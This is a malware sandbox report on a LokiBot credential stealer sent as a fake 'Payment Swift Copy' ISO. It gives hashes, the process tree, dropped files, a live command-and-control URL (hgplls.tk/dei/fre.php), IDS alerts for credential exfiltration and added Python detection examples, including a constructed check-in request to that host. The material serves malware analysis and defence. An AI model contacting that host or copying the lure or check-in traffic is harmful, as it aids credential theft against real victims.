File name: Payment Swift Copy HK LTGD #6736722.iso
Full analysis: https://app.any.run/tasks/768e6f78-bfe3-4551-a69a-b93b1501b0e2
Verdict: Malicious activity
Threats: LokiBot
LokiBot was developed in 2015 to steal credentials and other data from a wide range of applications. Despite its age, the malware remains popular among cybercriminals.

Analysis date: December 18, 2018, 16:02:57
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: trojan, lokibot
Indicators:
MIME: application/x-iso9660-image
File info: ISO 9660 CD-ROM filesystem data 'Payment Swift Copy HK LTGD #6736' (the ISO 9660 volume identifier is a 32-byte field, so the label is cut off before "722")
MD5: E0823F9E97AEF806C8F8B163129D00EC
SHA1: 3C4AC2D0F179F90E2583BC4C4968B9CE602A1E7D
SHA256: 787829C97DB186CFBC162A349F5D4AB5F256EA0B4BADFD996B6618FEDCF0CE2E
SSDEEP: 3072:q0wFY5FbfmPyg7DIFpRqzgxAxl+9BmntzFRoSxFEAWLT1djAB:q0ocFbfmP9DIFpRY7DQm9ob

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Application was dropped or rewritten from another process
      • Payment Swift Copy HK LTGD #6736722.exe (PID: 3624)
      • Payment Swift Copy HK LTGD #6736722.exe (PID: 2872)
    • Detected artifacts of LokiBot
      • Payment Swift Copy HK LTGD #6736722.exe (PID: 3624)
    • LOKIBOT was detected
      • Payment Swift Copy HK LTGD #6736722.exe (PID: 3624)
    • Connects to CnC server
      • Payment Swift Copy HK LTGD #6736722.exe (PID: 3624)
    • Actions look like stealing of personal data
      • Payment Swift Copy HK LTGD #6736722.exe (PID: 3624)
  • SUSPICIOUS
    • Application launched itself
      • Payment Swift Copy HK LTGD #6736722.exe (PID: 2872)
    • Loads DLL from Mozilla Firefox
      • Payment Swift Copy HK LTGD #6736722.exe (PID: 3624)
    • Executable content was dropped or overwritten
      • WinRAR.exe (PID: 2996)
      • Payment Swift Copy HK LTGD #6736722.exe (PID: 3624)
    • Creates files in the user directory
      • Payment Swift Copy HK LTGD #6736722.exe (PID: 3624)
      • notepad++.exe (PID: 1912)
  • INFO
    No info indicators.
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report
No Malware configuration.

TRiD

.iso | ISO 9660 CD image (27.6)
.atn | Photoshop Action (27.1)
.gmc | Game Music Creator Music (6.1)

EXIF

ISO
System: Win32
VolumeName: Payment Swift Copy HK LTGD #6736
VolumeBlockCount: 168
VolumeBlockSize: 2048
RootDirectoryCreateDate: 2018:12:18 11:35:01+04:30
Software: PowerISO
VolumeCreateDate: 2018:12:18 11:35:01.00+04:30
VolumeModifyDate: 2018:12:18 11:35:01.00+04:30

Composite
VolumeSize: 336 kB (168 blocks x 2048 bytes = 344,064 bytes)
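The EXIF block above is what a metadata tool reads out of the image's ISO 9660 Primary Volume Descriptor at sector 16. The following is an added example, not part of the ANY.RUN report or its tooling: a reader that recovers the same fields (System, VolumeName, VolumeBlockCount, VolumeBlockSize, Software, the root directory date, volume dates and the computed VolumeSize) from raw image bytes, plus a consistency check that the block count matches the file size. Because the malicious ISO is not included, `build_sample_iso()` constructs a minimal image carrying the values listed in this report; the constructed descriptor is an assumption about layout values, not a copy of the sample.

```python
"""ISO 9660 Primary Volume Descriptor reader (added example, not ANY.RUN code)."""
import struct
from datetime import datetime, timedelta, timezone

SECTOR = 2048
PVD_LBA = 16                      # ECMA-119: the system area is 16 sectors, the PVD follows


def _tz(quarter_hours: int) -> timezone:
    # Offsets are stored as a signed count of 15-minute steps from GMT (+04:30 == 18).
    return timezone(timedelta(minutes=15 * quarter_hours))


def _decimal_datetime(raw: bytes):
    """17-byte 'dec-datetime' used by the volume dates: YYYYMMDDHHMMSScc + tz byte."""
    text = raw[:16].decode("ascii", "replace")
    if text.startswith("0000"):          # all-zero field means 'not specified'
        return None
    (tz,) = struct.unpack("<b", raw[16:17])
    return datetime.strptime(text[:14], "%Y%m%d%H%M%S").replace(tzinfo=_tz(tz))


def _record_datetime(raw: bytes):
    """7-byte recording date inside directory records: years since 1900, M, D, h, m, s, tz."""
    year, month, day, hour, minute, second, tz = struct.unpack("<BBBBBBb", raw[:7])
    if month == 0:
        return None
    return datetime(1900 + year, month, day, hour, minute, second, tzinfo=_tz(tz))


def parse_pvd(image: bytes) -> dict:
    """Return the descriptor fields, or raise if sector 16 is not a valid PVD."""
    pvd = image[PVD_LBA * SECTOR:(PVD_LBA + 1) * SECTOR]
    if len(pvd) < SECTOR or pvd[0] != 1 or pvd[1:6] != b"CD001":
        raise ValueError("no ISO 9660 primary volume descriptor at sector 16")
    # Numeric fields are stored both-endian; read the little-endian copy.
    block_count = struct.unpack_from("<I", pvd, 80)[0]
    block_size = struct.unpack_from("<H", pvd, 128)[0]
    return {
        "System": pvd[8:40].decode("ascii", "replace").rstrip(),
        "VolumeName": pvd[40:72].decode("ascii", "replace").rstrip(),   # 32-byte field
        "VolumeBlockCount": block_count,
        "VolumeBlockSize": block_size,
        "RootDirectoryCreateDate": _record_datetime(pvd[156 + 18:156 + 25]),
        "Software": pvd[574:702].decode("ascii", "replace").rstrip(),   # 'Application Identifier'
        "VolumeCreateDate": _decimal_datetime(pvd[813:830]),
        "VolumeModifyDate": _decimal_datetime(pvd[830:847]),
        "VolumeSize": block_count * block_size,
        # A descriptor claiming more blocks than the file holds is itself worth a look.
        "SizeMatchesImage": block_count * block_size == len(image),
    }


def build_sample_iso() -> bytes:
    """Constructed image: zero system area plus a PVD with the values this report lists."""
    pvd = bytearray(SECTOR)
    pvd[0] = 1
    pvd[1:6] = b"CD001"
    pvd[6] = 1
    pvd[8:40] = b"Win32".ljust(32)
    # The identifier field is 32 bytes, which is why '#6736722' is cut to '#6736'.
    pvd[40:72] = b"Payment Swift Copy HK LTGD #6736722"[:32]
    struct.pack_into("<I", pvd, 80, 168)
    struct.pack_into(">I", pvd, 84, 168)
    struct.pack_into("<H", pvd, 128, SECTOR)
    struct.pack_into(">H", pvd, 130, SECTOR)
    pvd[156] = 34                                            # root directory record length
    pvd[174:181] = bytes([118, 12, 18, 11, 35, 1, 18])       # 2018-12-18 11:35:01 +04:30
    pvd[574:702] = b"PowerISO".ljust(128)
    pvd[813:830] = b"2018121811350100" + bytes([18])
    pvd[830:847] = b"2018121811350100" + bytes([18])
    image = bytearray(PVD_LBA * SECTOR) + pvd
    image += bytes(168 * SECTOR - len(image))                # pad to VolumeBlockCount sectors
    return bytes(image)


if __name__ == "__main__":
    for key, value in parse_pvd(build_sample_iso()).items():
        print(f"{key}: {value}")
```

For a real image, pass `open(path, "rb").read()` to `parse_pvd`; only the first 17 sectors are needed for the fields, but the whole file is needed for the size check.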
All screenshots are available in the full report
Total processes: 37
Monitored processes: 6
Malicious processes: 2
Suspicious processes: 0

Behavior graph

explorer.exe
  ├─ rundll32.exe (PID 2812; shell32.dll,OpenAs_RunDLL on the .iso, i.e. the Open With dialog; no specs)
  │    └─ WinRAR.exe (PID 2996) extracts Payment Swift Copy HK LTGD #6736722.exe to the Desktop
  ├─ Payment Swift Copy HK LTGD #6736722.exe (PID 2872; no specs)
  │    └─ Payment Swift Copy HK LTGD #6736722.exe (PID 3624) #LOKIBOT
  └─ notepad++.exe (PID 1912)
       └─ gup.exe (PID 3748)

Process information

PID 2812: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\Payment Swift Copy HK LTGD #6736722.iso
  Path: C:\Windows\system32\rundll32.exe
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Integrity level: MEDIUM
  Description: Windows host process (Rundll32)
  Exit code: 0
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 2996: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Payment Swift Copy HK LTGD #6736722.iso"
  Path: C:\Program Files\WinRAR\WinRAR.exe
  Parent process: rundll32.exe
  User: admin
  Company: Alexander Roshal
  Integrity level: MEDIUM
  Description: WinRAR archiver
  Version: 5.60.0

PID 2872: "C:\Users\admin\Desktop\Payment Swift Copy HK LTGD #6736722.exe"
  Path: C:\Users\admin\Desktop\Payment Swift Copy HK LTGD #6736722.exe
  Parent process: explorer.exe
  User: admin
  Company: PHIliPs
  Integrity level: MEDIUM
  Description: PIRifOrm LTD
  Version: 1.00

PID 3624: "C:\Users\admin\Desktop\Payment Swift Copy HK LTGD #6736722.exe"
  Path: C:\Users\admin\Desktop\Payment Swift Copy HK LTGD #6736722.exe
  Parent process: Payment Swift Copy HK LTGD #6736722.exe
  User: admin
  Company: PHIliPs
  Integrity level: MEDIUM
  Description: PIRifOrm LTD
  Version: 1.00

PID 1912: "C:\Program Files\Notepad++\notepad++.exe" "C:\Users\admin\Desktop\Payment Swift Copy HK LTGD #6736722.exe"
  Path: C:\Program Files\Notepad++\notepad++.exe
  Parent process: explorer.exe
  User: admin
  Company: (not set)
  Integrity level: MEDIUM
  Description: Notepad++ : a free (GNU) source code editor
  Exit code: 0
  Version: 7.51

PID 3748: "C:\Program Files\Notepad++\updater\gup.exe" -v7.51
  Path: C:\Program Files\Notepad++\updater\gup.exe
  Parent process: notepad++.exe
  User: admin
  Company: (not set)
  Integrity level: MEDIUM
  Description: GUP : a free (LGPL) Generic Updater
  Exit code: 0
  Version: 4.1
Total events: 999
Read events: 897
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 2
Suspicious files: 0
Text files: 7
Unknown types: 2

Dropped files

PID 3624  Payment Swift Copy HK LTGD #6736722.exe
  C:\Users\admin\AppData\Roaming\F63AAA\A71D80.lck  (type and hashes not listed)

PID 3624  Payment Swift Copy HK LTGD #6736722.exe
  C:\Users\admin\AppData\Roaming\F63AAA\A71D80.exe  (executable)
  MD5: 11A775B09526209FA1EF829042C34E4A
  SHA256: CCB342A5293C4893089DB3EEE51056F54A88BD8695CD9C043624B5C1369F1505

PID 2996  WinRAR.exe
  C:\Users\admin\Desktop\Payment Swift Copy HK LTGD #6736722.exe  (executable)
  MD5: 11A775B09526209FA1EF829042C34E4A
  SHA256: CCB342A5293C4893089DB3EEE51056F54A88BD8695CD9C043624B5C1369F1505

PID 3624  Payment Swift Copy HK LTGD #6736722.exe
  C:\Users\admin\AppData\Roaming\F63AAA\A71D80.hdb  (text)
  MD5: 5302B1B5EC232D44E2D9507FB847FC49
  SHA256: 20B58A25872B1E3F7D47DAE0C090ACF229C49B6E33939934513499CC37BB2684

PID 1912  notepad++.exe
  C:\Users\admin\AppData\Roaming\Notepad++\session.xml  (text)
  MD5: A8D78200679D57D072E78230E617800E
  SHA256: 3BC0E569B22343618299A53E6BEA804B4B3F5DF4A4BA04528080F34545AD6E3D

PID 1912  notepad++.exe
  C:\Users\admin\AppData\Roaming\Notepad++\config.xml  (xml)
  MD5: 31401E84150FDD475E79C0F607AF1D50
  SHA256: AB20E3EAE7C4EF474F9C4C279BB5A94578E39EB2E363826065D3B037F367EC9D

PID 1912  notepad++.exe
  C:\Users\admin\AppData\Roaming\Notepad++\stylers.xml  (xml)
  MD5: 44982E1D48434C0AB3E8277E322DD1E4
  SHA256: 3E661D3F1FF3977B022A0ACC26B840B5E57D600BC03DCFC6BEFDB408C665904C

PID 3624  Payment Swift Copy HK LTGD #6736722.exe
  C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2f  (dbf)
  MD5: 18B8CFC0185C50383AAC0A4F30A9DAC8
  SHA256: 913E8CED6A447FE791954D382ABA52D490513C5D2F689B391866C7E561F89A03

PID 1912  notepad++.exe
  C:\Users\admin\AppData\Roaming\Notepad++\langs.xml  (xml)
  MD5: E792264BEC29005B9044A435FBA185AB
  SHA256: 5298FD2F119C43D04F6CF831F379EC25B4156192278E40E458EC356F9B49D624

PID 1912  notepad++.exe
  C:\Users\admin\AppData\Roaming\Notepad++\plugins\Config\converter.ini  (text)
  MD5: F70F579156C93B097E656CABA577A5C9
  SHA256: B926498A19CA95DC28964B7336E5847107DD3C0F52C85195C135D9DD6CA402D4

The dropped A71D80.exe carries the same MD5 and SHA256 as the executable WinRAR extracted to the Desktop: the sample copies itself into a six-character hex folder under %APPDATA% and writes .lck and .hdb companions beside it.
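As an added example (not ANY.RUN code), the drop layout from the table above turned into a host-side hunt: walk a Roaming directory for a six-hex-character folder holding a same-named .exe plus .lck, hash the executable and compare it with hashes you already know (here the launched binary), so a self-copy is recognised instead of being triaged as a new sample. The directory tree is constructed in a temporary directory with placeholder contents; the real binary and its hashes are not reproduced.

```python
"""Hunt for the Roaming\\<hex6>\\<hex6>.exe + .lck drop layout (added example)."""
import hashlib
import re
import tempfile
from pathlib import Path

HEX6 = re.compile(r"^[0-9A-F]{6}$", re.I)


def sha256_of(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest().upper()


def find_appdata_drops(roaming: Path, known: dict) -> list:
    """One finding per Roaming\\<hex6>\\ folder holding <hex6>.exe next to <hex6>.lck."""
    findings = []
    for folder in sorted(p for p in roaming.iterdir() if p.is_dir() and HEX6.match(p.name)):
        by_suffix = {p.suffix.lower(): p for p in folder.iterdir()
                     if p.is_file() and HEX6.match(p.stem)}
        exe, lck = by_suffix.get(".exe"), by_suffix.get(".lck")
        if exe is None or lck is None:
            continue                      # a hex-named folder alone is not enough evidence
        digest = sha256_of(exe)
        findings.append({
            "folder": folder.name,
            "exe": exe.name,
            "sha256": digest,
            "same_as": known.get(digest),         # e.g. the file the user launched
            "companions": sorted(s for s in by_suffix if s != ".exe"),
        })
    return findings


def build_sample_tree():
    """Constructed tree mirroring the report's paths; returns (Roaming dir, launched exe)."""
    root = Path(tempfile.mkdtemp(prefix="lokibot-hunt-"))
    payload = b"MZ placeholder, not the real sample\n"        # constructed content
    desktop = root / "Desktop"
    desktop.mkdir()
    launched = desktop / "Payment Swift Copy HK LTGD #6736722.exe"
    launched.write_bytes(payload)
    roaming = root / "AppData" / "Roaming"
    drop = roaming / "F63AAA"
    drop.mkdir(parents=True)
    (drop / "A71D80.exe").write_bytes(payload)          # self-copy: same bytes, same hash
    (drop / "A71D80.lck").write_bytes(b"")
    (drop / "A71D80.hdb").write_bytes(b"constructed\n")
    (roaming / "Notepad++").mkdir()                     # benign neighbour, must not match
    (roaming / "Notepad++" / "session.xml").write_bytes(b"<xml/>")
    (roaming / "ABCDEF").mkdir()                        # hex folder without the file pair
    (roaming / "ABCDEF" / "readme.txt").write_bytes(b"")
    return roaming, launched


def hunt_sample() -> list:
    roaming, launched = build_sample_tree()
    return find_appdata_drops(roaming, {sha256_of(launched): launched.name})


if __name__ == "__main__":
    for hit in hunt_sample():
        print(hit)
```

On a live host, point `find_appdata_drops` at each user's `AppData\Roaming` and feed `known` with the hashes of whatever the user opened; a hit whose `same_as` is empty is a new binary to pull for analysis.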
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 5
TCP/UDP connections: 5
DNS requests: 3
Threats: 0

HTTP requests

(no PID listed)  GET  200  104.107.210.17:80  http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEBPqKHBb9OztDDZjCYBhQzY%3D  (CN: NL, der, 471 b, whitelisted)
3624  Payment Swift Copy HK LTGD #6736722.exe  POST  104.18.58.33:80  http://hgplls.tk/dei/fre.php  (CN: US, malicious)
3624  Payment Swift Copy HK LTGD #6736722.exe  POST  104.18.58.33:80  http://hgplls.tk/dei/fre.php  (CN: US, malicious)
(no PID listed)  GET  200  104.107.210.17:80  http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEAXk3DuUOKs7hZfLpqGYUOM%3D  (CN: NL, der, 727 b, whitelisted)
3624  Payment Swift Copy HK LTGD #6736722.exe  POST  104.18.58.33:80  http://hgplls.tk/dei/fre.php  (CN: US, malicious)

No HTTP response code is recorded for the three POSTs to hgplls.tk; the two OCSP GETs are certificate-revocation checks, not sample traffic.

Connections

PID   Process                                   IP                  Domain                 ASN                         CN  Reputation
3748  gup.exe                                   37.59.28.236:443    notepad-plus-plus.org  OVH SAS                     FR  whitelisted
(none listed)                                   104.107.210.17:80   ocsp.usertrust.com     Akamai International B.V.   NL  whitelisted
3624  Payment Swift Copy HK LTGD #6736722.exe   104.18.58.33:80     hgplls.tk              Cloudflare Inc              US  shared

DNS requests

Domain                 IP                               Reputation
hgplls.tk              104.18.58.33, 104.18.59.33       malicious
notepad-plus-plus.org  37.59.28.236                     whitelisted
ocsp.usertrust.com     104.107.210.17, 104.107.210.34   whitelisted

Threats

PID   Process                                   Class                          Message
3624  Payment Swift Copy HK LTGD #6736722.exe   A Network Trojan was detected  ET TROJAN LokiBot User-Agent (Charon/Inferno)
3624  Payment Swift Copy HK LTGD #6736722.exe   A Network Trojan was detected  ET TROJAN LokiBot Checkin
3624  Payment Swift Copy HK LTGD #6736722.exe   Potentially Bad Traffic        ET POLICY HTTP Request to a *.tk domain
3624  Payment Swift Copy HK LTGD #6736722.exe   A Network Trojan was detected  ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
3624  Payment Swift Copy HK LTGD #6736722.exe   A Network Trojan was detected  ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
3624  Payment Swift Copy HK LTGD #6736722.exe   A Network Trojan was detected  MALWARE [PTsecurity] Loki Bot Check-in M2
3624  Payment Swift Copy HK LTGD #6736722.exe   A Network Trojan was detected  ET TROJAN LokiBot User-Agent (Charon/Inferno)
3624  Payment Swift Copy HK LTGD #6736722.exe   A Network Trojan was detected  ET TROJAN LokiBot Checkin
3624  Payment Swift Copy HK LTGD #6736722.exe   Potentially Bad Traffic        ET POLICY HTTP Request to a *.tk domain
3624  Payment Swift Copy HK LTGD #6736722.exe   A Network Trojan was detected  ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
3 ETPRO signatures available at the full report
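The alerts above fire on three observable traits of the sample's traffic: the User-Agent the "Charon/Inferno" signature is named after, a request to a *.tk domain, and repeated POSTs of data to http://hgplls.tk/dei/fre.php. The following is an added example, not an ANY.RUN or Emerging Threats rule: a small matcher that applies those three checks to reconstructed HTTP request heads, as you would when triaging the PCAP without the IDS. The request texts are constructed; the User-Agent value `Mozilla/4.08 (Charon; Inferno)` and the `application/octet-stream` Content-Type are assumptions inferred from the signature names, not values copied from this report.

```python
"""Flag LokiBot-style check-in/exfiltration requests in HTTP request heads (added example)."""


def parse_request(raw: str) -> dict:
    """Split an HTTP request head into method, path and lower-cased header names."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def _host(req: dict) -> str:
    return req["headers"].get("host", "").lower().rsplit(":", 1)[0]


RULES = {
    # Both tokens of the User-Agent the ET signature is named after (assumed exact string).
    "lokibot_user_agent": lambda r: all(
        tok in r["headers"].get("user-agent", "").lower() for tok in ("charon", "inferno")),
    # Mirrors 'ET POLICY HTTP Request to a *.tk domain'.
    "request_to_tk_domain": lambda r: _host(r).endswith(".tk"),
    # Shape of the check-in/exfil seen here: a binary POST to a .php endpoint (Content-Type assumed).
    "binary_post_to_php": lambda r: (
        r["method"] == "POST"
        and r["path"].lower().endswith(".php")
        and r["headers"].get("content-type", "").lower().startswith("application/octet-stream")),
}


def scan_requests(requests: list) -> list:
    """Return, per request, the URL and the names of the rules it triggered."""
    results = []
    for raw in requests:
        req = parse_request(raw)
        results.append({
            "url": f"http://{_host(req)}{req['path']}",
            "rules": [name for name, check in RULES.items() if check(req)],
        })
    return results


def iocs(results: list) -> list:
    """URLs worth blocking: anything that hit the User-Agent rule or the binary-POST rule."""
    return sorted({r["url"] for r in results
                   if {"lokibot_user_agent", "binary_post_to_php"} & set(r["rules"])})


# Constructed traffic: one check-in shaped like the sample's POSTs, one legitimate OCSP GET.
SAMPLE_REQUESTS = [
    "POST /dei/fre.php HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"         # assumed value, from the signature name
    "Host: hgplls.tk\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/octet-stream\r\n"             # assumed
    "Content-Length: 4\r\n\r\n"
    "\x12\x00\x00\x00",
    "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEBPqKHBb9OztDDZjCYBhQzY%3D HTTP/1.1\r\n"
    "Host: ocsp.usertrust.com\r\n"
    "User-Agent: Microsoft-CryptoAPI/6.1\r\n"                # constructed benign UA
    "Accept: */*\r\n\r\n",
]


if __name__ == "__main__":
    for result in scan_requests(SAMPLE_REQUESTS):
        print(result)
    print("block:", iocs(scan_requests(SAMPLE_REQUESTS)))
```

The OCSP request is included on purpose: it comes from the same PCAP and is whitelisted by the sandbox, so a matcher that keyed only on "POST from the malicious process" would still be wrong to block it. The `*.tk` rule is policy, not detection, which is why `iocs()` ignores it on its own.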
Process        Message
notepad++.exe  VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe  VerifyLibrary: certificate revocation checking is disabled
notepad++.exe  42C4C5846BB675C74E2B2C90C69AB44366401093